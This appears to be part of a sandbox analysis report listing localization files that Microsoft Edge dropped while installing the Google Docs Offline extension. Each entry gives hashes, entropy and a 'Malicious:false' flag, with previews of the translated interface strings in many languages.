                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):954
                                                                                                                                                                                                                                                                          Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                          MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                          SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                          SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                                          SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir6432_2023621098\CRX_INSTALL\_locales\it\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):756
                                                                                                                                                                                                                                                                          Entropy (8bit):4.568978941644684
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:YGWxI8WJOJJrJ3Wytqx93bjPJgdpjV8AgJJmhyDmujqE0Xdqekn:YhaJOTBFtqWdj8AgjGrulY3k
                                                                                                                                                                                                                                                                          MD5:88A9ACD41521D1D00B870E2DA3044A88
                                                                                                                                                                                                                                                                          SHA1:36716937CE047463DBFA5CF1F5EF4277FE354D9E
                                                                                                                                                                                                                                                                          SHA-256:3377A873DB531113D79919E7A89369A79A602BAC6AE09B9864B9378DC285F345
                                                                                                                                                                                                                                                                          SHA-512:A56FFA200C5F8B312D8ED77EA40DF931B86074ADF1577941726D184497531D1C89D77382983F01797604E6A5C34029FA88F3AAE0D52C368E2046C0C6F21CD956
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"CREA NUOVO"},"explanationofflinedisabled":{"message":"Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet."},"explanationofflineenabled":{"message":"Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi."},"extdesc":{"message":"Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet."},"extname":{"message":"Documenti Google offline"},"learnmore":{"message":"Ulteriori informazioni"},"popuphelptext":{"message":"Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet."}}.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir6432_2023621098\CRX_INSTALL\_locales\iw\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2230
                                                                                                                                                                                                                                                                          Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                          MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                          SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                          SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                                          SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir6432_2023621098\CRX_INSTALL\_locales\ja\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1779
                                                                                                                                                                                                                                                                          Entropy (8bit):4.178873861626396
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:YW5wHiffZLuSU5VHifpDHgL0z80CtZ78988qyHjQBZU0CM:9oGQ5fiT4Hz98PoKW
                                                                                                                                                                                                                                                                          MD5:113A674F2E4C66CC4D2A9C66ED77ADEA
                                                                                                                                                                                                                                                                          SHA1:F5D38B743EFA022D6F886BACD3AFA850557E2762
                                                                                                                                                                                                                                                                          SHA-256:C1094A1D8457E782F229910B70FC7AECE356AA779A423E869104946814660D35
                                                                                                                                                                                                                                                                          SHA-512:E7CD847D87DFEA3228A1899AAB7F27F59D7BA2919E81520501A9236C55FCDEA418F1D29C3C9EB36E34CDFBA3278E3BBD149DDF324C94295E029031FCD5A75677
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u65b0\u898f\u4f5c\u6210"},"explanationofflinedisabled":{"message":"\u73fe\u5728\u30aa\u30d5\u30e9\u30a4\u30f3\u3067\u3059\u3002\u30a4\u30f3\u30bf\u30fc\u30cd\u30c3\u30c8\u306b\u63a5\u7d9a\u305b\u305a\u306b Google \u30c9\u30ad\u30e5\u30e1\u30f3\u30c8\u3092\u4f7f\u7528\u3059\u308b\u306b\u306f\u3001\u6b21\u56de\u30a4\u30f3\u30bf\u30fc\u30cd\u30c3\u30c8\u306b\u63a5\u7d9a\u3057\u305f\u3068\u304d\u306b Google \u30c9\u30ad\u30e5\u30e1\u30f3\u30c8\u306e\u30db\u30fc\u30e0\u753b\u9762\u304b\u3089 [\u8a2d\u5b9a] \u306b\u30a2\u30af\u30bb\u30b9\u3057\u3001[\u30aa\u30d5\u30e9\u30a4\u30f3\u540c\u671f] \u3092\u30aa\u30f3\u306b\u3057\u3066\u304f\u3060\u3055\u3044\u3002"},"explanationofflineenabled":{"message":"\u73fe\u5728\u30aa\u30d5\u30e9\u30a4\u30f3\u3067\u3059\u304c\u3001\u30a2\u30af\u30bb\u30b9\u53ef\u80fd\u306a\u30d5\u30a1\u30a4\u30eb\u306e\u7de8\u96c6\u3084\u65b0\u898f\u30d5\u30a1\u30a4\u30eb\u306e\u4f5c\u6210\u306f\u5f15\u304d\u7d9a\u304d\u884c\u3048\u307e\u3059\u3002"

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir6432_2023621098\CRX_INSTALL\_locales\ko\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1481
                                                                                                                                                                                                                                                                          Entropy (8bit):4.438028786617971
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:YhjgkAoIJwHBL6B97yyc3HEqwcnkozgGiz12k+dTyyS6qWhTVakIWHUNIJwzASE8:YVgJwHB2B9uycXrnLdGyS69oAHVwz5E8
                                                                                                                                                                                                                                                                          MD5:E71A91FE65DD32CAC3925CE639441675
                                                                                                                                                                                                                                                                          SHA1:91C981F572497A540C0C2C1D5FB28156D7E49416
                                                                                                                                                                                                                                                                          SHA-256:57F81A5FCBD1FEFD6EC3CDD525A85B707B4EEAD532C1B3092DAAFD88EE9268EC
                                                                                                                                                                                                                                                                          SHA-512:2B89C97470BAE1D55A40F7F1224930480D33C58968F67345CA26E188FF08CF8B2F1E5C5B38ECFDBF7EBFD9970BE0327CBFC391CF5E95E7C311868A8A9689DFB6
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\uc0c8\ub85c \ub9cc\ub4e4\uae30"},"explanationofflinedisabled":{"message":"\uc624\ud504\ub77c\uc778 \uc0c1\ud0dc\uc785\ub2c8\ub2e4. \uc778\ud130\ub137 \uc5f0\uacb0 \uc5c6\uc774 Google Docs\ub97c \uc0ac\uc6a9\ud558\ub824\uba74 Google Docs \ud648\ud398\uc774\uc9c0 \uc124\uc815\uc73c\ub85c \uc774\ub3d9\ud558\uc5ec \ub2e4\uc74c\ubc88\uc5d0 \uc778\ud130\ub137\uc5d0 \uc5f0\uacb0\ub418\uc5c8\uc744 \ub54c \uc624\ud504\ub77c\uc778 \ub3d9\uae30\ud654\ub97c \uc0ac\uc6a9\ud558\ub3c4\ub85d \uc124\uc815\ud558\uc138\uc694."},"explanationofflineenabled":{"message":"\uc624\ud504\ub77c\uc778 \uc0c1\ud0dc\uc785\ub2c8\ub2e4. \ud558\uc9c0\ub9cc \uc0ac\uc6a9 \uac00\ub2a5\ud55c \ud30c\uc77c\uc744 \uc218\uc815\ud558\uac70\ub098 \uc0c8\ub85c\uc6b4 \ud30c\uc77c\uc744 \ub9cc\ub4e4 \uc218 \uc788\uc2b5\ub2c8\ub2e4."},"extdesc":{"message":"\uc778\ud130\ub137\uc5d0 \uc5f0\uacb0\ud558\uc9c0 \uc54a\uace0\ub3c4 \ubb38\uc11c, \uc2a4\ud504\ub808\ub4dc\uc2dc\ud2b8 \ubc0f \ud504\ub808\uc820\ud14c\u

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir6432_2023621098\CRX_INSTALL\_locales\lt\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1002
                                                                                                                                                                                                                                                                          Entropy (8bit):4.8802108861635585
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:YSvYKw0rCbtOB3rK94Q3dZgHDEAFLiQjuRAm:YSvYKwtbtOB3ryNZgjPzM
                                                                                                                                                                                                                                                                          MD5:8047409DCC27BFCC97B3ABCE6DAB20EF
                                                                                                                                                                                                                                                                          SHA1:D85F7A7A3D16C441560D95CE094428973CBAD725
                                                                                                                                                                                                                                                                          SHA-256:B42EBFE071EF0EC4B4B6553ABF3A2C36B19792C238080A6FBC19D804D1ACB61C
                                                                                                                                                                                                                                                                          SHA-512:4DFFE23B4168A0825DC14ED781C3C0910702E8C2B496A8B86CA72FDBBA242F34FE430D6B2A219C4A189907E92B1A7B02CE2B4B9A54088222F5AF49878E385AA4
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"SUKURTI NAUJ\u0104"},"explanationofflinedisabled":{"message":"Esate neprisijung\u0119. Jei norite naudoti \u201eGoogle\u201c dokumentus be interneto ry\u0161io, pagrindiniame \u201eGoogle\u201c dokument\u0173 puslapyje eikite \u012f nustatym\u0173 skilt\u012f ir \u012fjunkite sinchronizavim\u0105 neprisijungus, kai kit\u0105 kart\u0105 b\u016bsite prisijung\u0119 prie interneto."},"explanationofflineenabled":{"message":"Esate neprisijung\u0119, bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj\u0173."},"extdesc":{"message":"Redaguokite, kurkite ir per\u017ei\u016br\u0117kite savo dokumentus, skai\u010diuokles ir pristatymus \u2013 visk\u0105 darykite be prieigos prie interneto."},"extname":{"message":"\u201eGoogle\u201c dokumentai neprisijungus"},"learnmore":{"message":"Su\u017einoti daugiau"},"popuphelptext":{"message":"Ra\u0161ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry\u0161\u012f arba nenaudodami jo."}

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir6432_2023621098\CRX_INSTALL\_locales\mn\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2778
                                                                                                                                                                                                                                                                          Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                                          MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                                          SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                                          SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                                          SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir6432_2023621098\CRX_INSTALL\_locales\mr\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2824
                                                                                                                                                                                                                                                                          Entropy (8bit):3.8290584520300373
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:YdYlznMbTiR6ZEpJpVznNRlznoJoZK4EbOZEXZznx5Y9Zc+qYEe4:uMouV57Ao/CZ9F
                                                                                                                                                                                                                                                                          MD5:34CE3FA84E699BCE78E026D0F0A0C705
                                                                                                                                                                                                                                                                          SHA1:5C56D09AF53D521FE4224A77AA66E61A3B0165CA
                                                                                                                                                                                                                                                                          SHA-256:275E7FADB93A810328E3ADEAD8754DD0A19A062D5D20A872F7471FFAB47AA7B3
                                                                                                                                                                                                                                                                          SHA-512:3A6CD2EA06B664689F089D35FCFA41B36C22B1D77CF78F66D0F5DCDC52A6BB29F7566D377B81EDCE6001B71CB7F1E1247D3D71965BAA2E8EA9E6DEAA208CF25B
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u0928\u0935\u0940\u0928 \u0924\u092f\u093e\u0930 \u0915\u0930\u093e"},"explanationofflinedisabled":{"message":"\u0924\u0941\u092e\u094d\u0939\u0940 \u0911\u092b\u0932\u093e\u0907\u0928 \u0906\u0939\u093e\u0924. \u0915\u094b\u0923\u0924\u094d\u092f\u093e\u0939\u0940 \u0907\u0902\u091f\u0930\u0928\u0947\u091f \u0915\u0928\u0947\u0915\u094d\u0936\u0928 \u0936\u093f\u0935\u093e\u092f Google \u0926\u0938\u094d\u0924\u0910\u0935\u091c \u0935\u093e\u092a\u0930\u0923\u094d\u092f\u093e\u0938\u093e\u0920\u0940, Google \u0926\u0938\u094d\u0924\u0910\u0935\u091c \u092e\u0941\u0916\u094d\u200d\u092f\u092a\u0943\u0937\u094d\u0920\u093e\u0935\u0930 \u0938\u0947\u091f\u093f\u0902\u0917\u094d\u091c\u0935\u0930 \u091c\u093e \u0906\u0923\u093f \u092a\u0941\u0922\u0940\u0932 \u0935\u0947\u0933\u0940 \u0924\u0941\u092e\u094d\u0939\u0940 \u0907\u0902\u091f\u0930\u0928\u0947\u091f\u0936\u0940 \u0915\u0928\u0947\u0915\u094d\u091f \u0905\u0938\u0924\u093e\u0928\u093e \u0911\u092b\u093

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir6432_2023621098\CRX_INSTALL\_locales\my\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):3830
                                                                                                                                                                                                                                                                          Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                          MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                          SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                          SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                          SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir6432_2023621098\CRX_INSTALL\_locales\no\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):758
                                                                                                                                                                                                                                                                          Entropy (8bit):4.58900710997284
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:YGTzZxePwmwt69tynax7wrQ1gdUNIyk9WMwuwSQhxXzDyrjgQO:YudUwmwsynaPGdUNILcWwfxDyrj9O
                                                                                                                                                                                                                                                                          MD5:66439BA3ED5BA0C702EF94793E15DE83
                                                                                                                                                                                                                                                                          SHA1:2B3CA2C2BE15207DEAE55E1D667C9DCDC9241C74
                                                                                                                                                                                                                                                                          SHA-256:B3ECE279943B28C8D855EC86AC1CE53BDFB6A709240D653508764493A75F7518
                                                                                                                                                                                                                                                                          SHA-512:8B393F3BE96020181A12A16FAFDAE9DF555B09A7B03CC855009B26A48B0C7D583476A72BB28224E419D300013FE272316C2CB35DE8D67DBAB454B7CAE8DF6B94
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"OPPRETT NYTT"},"explanationofflinedisabled":{"message":"Du er uten nett. For \u00e5 bruke Google Dokumenter uten internettilkobling, g\u00e5 til innstillingene p\u00e5 Google Dokumenter-nettsiden og sl\u00e5 p\u00e5 synkronisering uten nett neste gang du er koblet til Internett."},"explanationofflineenabled":{"message":"Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye."},"extdesc":{"message":"Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine \u2013 uten nettilgang."},"extname":{"message":"Google Dokumenter uten nett"},"learnmore":{"message":"Finn ut mer"},"popuphelptext":{"message":"Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling."}}.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir6432_2023621098\CRX_INSTALL\_locales\pa\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2766
                                                                                                                                                                                                                                                                          Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                          MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                          SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                          SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                          SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir6432_2023621098\CRX_INSTALL\_locales\pl\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):978
                                                                                                                                                                                                                                                                          Entropy (8bit):5.03221369527458
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:YG7xzyFrRo+Hj9iragSZyoifI3zMtuaxSmD2zO1gdGEsK/ULjPAbHGjKq4OqQyXr:YU0BDsbIm7kd9rYcbm2PQzb9JDeaTe9
                                                                                                                                                                                                                                                                          MD5:10BA7FE4CAB38642419BE8FEF9E78178
                                                                                                                                                                                                                                                                          SHA1:FDDD00441DCCFF459F8ABCA12BA1856B9B1E299B
                                                                                                                                                                                                                                                                          SHA-256:6538F562BD1BAA828C0EF0ADC5F7C96B4A0EB7814E6B9A2B585E4D3B92B0E61D
                                                                                                                                                                                                                                                                          SHA-512:07E490D44F8F8A2BDC2D4AD15753AD16E39D17693219418B02820D26558FBE3FCE8A8583BAE0ED876ACC6326080867D05A732CD9A4C24B620753B84BDA4AC031
